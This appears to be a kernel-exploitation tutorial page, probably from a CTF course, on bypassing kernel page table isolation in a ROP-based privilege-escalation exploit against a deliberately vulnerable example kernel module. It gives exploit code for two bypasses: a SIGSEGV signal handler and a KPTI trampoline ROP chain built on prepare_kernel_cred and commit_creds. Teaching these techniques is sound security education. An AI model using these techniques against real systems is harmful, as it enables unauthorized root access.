Kernel page table isolation (KPTI)

Kernel page table isolation is documented as a countermeasure to shared userspace and kernel space attacks like Meltdown.

There is a set of unique pagetables for userspace and a a unique set for kernel space. When switching into kernel mode execution or from kernel mode execution, the page tables currently being used are swapped between kernel space and userspace.

Consequently because this is a protection against the Meltdown form of attack, our buffer overflow example doesn't need to add a lot to it's existing exploit to overcome this mitigation.

Annoyingly, all it does it send a segfault to our process when returning from kernel space into userspace in our kernel_rop exploit.

The ./launch_SMEP_KPTI.sh script launch the example kernel with KPTI enabled and running our existing exploit results in a segfault:

There are two main techniques in over comming this mitigation:

Signal Handler

Since our process is being sent a segfault, we can register a signal handler to handle that segfault and call our drop_shell function.

Our exploit's main function will look something like:

void main() {
  /*
   * Interacting with this kernel module is easy
   * just treat it like a file
   */

  int fd;
  unsigned long stack_cookie;

  fd = open(KERN_MODULE, O_RDWR);
  if (fd < 0)
    exit_and_log("Failed to open kernel module\n");

  /*
   * Just like a userspace buffer overflow, a stack
   * read will give us the stack cookie that we can
   * use when doing our kernel space overflow
   */
  stack_cookie = do_leak(fd);

  /*
   * Get prepare_kernel_cred and commit_creds using
   * /proc/kallsyms
   */
  get_kernel_addresses();

  /*
   * Get registers that we'll need to restore later
   */
  save_state();

  /*
   * KPTI will issue a SEGFAULT when returning to userspace
   * So we can simply register a signal handler to catch
   * this signal and run the drop_shell function instead
   */ 
  signal(SIGSEGV, drop_shell);

  /*
   * Overwrite the program counter and execute our
   * shellcode!
   */
  overwrite_pc(fd, stack_cookie, kernel_base);

  printf("At end of main\n");

  close(fd);
}

This simple addition should work in most CTF cases and we can run our original exploit again and see it work:

KPTI trampoline

The idea behind this technique is use the kernel's existing method of transitioning between userspace and kernelspace page tables in our exploit to transition gracefully to our drop_shell function.

The function swapgs_restore_regs_and_return_to_usermode is used to move between these two pages and with an appropriate leak we can reuse this function in our rop chain.

The source for this function can be found here:

POP_REGS pop_rdi=0

/*
    * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
    * Save old stack pointer and switch to trampoline stack.
    */
movq	%rsp, %rdi
movq	PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp
UNWIND_HINT_EMPTY

/* Copy the IRET frame to the trampoline stack. */
pushq	6*8(%rdi)	/* SS */
pushq	5*8(%rdi)	/* RSP */
pushq	4*8(%rdi)	/* EFLAGS */
pushq	3*8(%rdi)	/* CS */
pushq	2*8(%rdi)	/* RIP */

/* Push user RDI on the trampoline stack. */
pushq	(%rdi)

/*
    * We are on the trampoline stack.  All regs except RDI are live.
    * We can do future final exit work right here.
    */
STACKLEAK_ERASE_NOCLOBBER

SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

/* Restore RDI. */
popq	%rdi
SWAPGS
INTERRUPT_RETURN

You can use the whole function, however you would need a lot of dummy registers for the whole POP_REGS macro, which will try and pop every register onto the stack.

Instead since we control the program counter, we usually want to jump into the middle of this function around the first mov instruction to follow the swapgs and iretq instructions.

So instead of registering a signal handler, we simply add a gadget at the end of our rop chain pointing to the kpti trampoline with some dummy values for the extra pop instructions:

  buf[cookie_offset] = stack_cookie;
  buf[cookie_offset + 1] = 0x4141414141414141;          // rbx
  buf[cookie_offset + 2] = 0x4141414141414242;          // rdx
  buf[cookie_offset + 3] = pop_rdi_ret;
  buf[cookie_offset + 4] = 0 ; // Argument for prepare_kernel_cred
  buf[cookie_offset + 5] = prepare_kernel_cred;
  buf[cookie_offset + 6] = mov_rax_rdi; // move cred struct to argument
  buf[cookie_offset + 7] = commit_creds;
  buf[cookie_offset + 8] = kpti_trampoline;
  buf[cookie_offset + 9] = 0x0; // < --- rax
  buf[cookie_offset + 10] = 0x0; // < --- rdi
  buf[cookie_offset + 11] = user_rip; // <-- here is drop shell function
  buf[cookie_offset + 12] = user_cs;
  buf[cookie_offset + 13] = user_rflags;
  buf[cookie_offset + 14] = user_sp;
  buf[cookie_offset + 15] = user_ss;

Last updated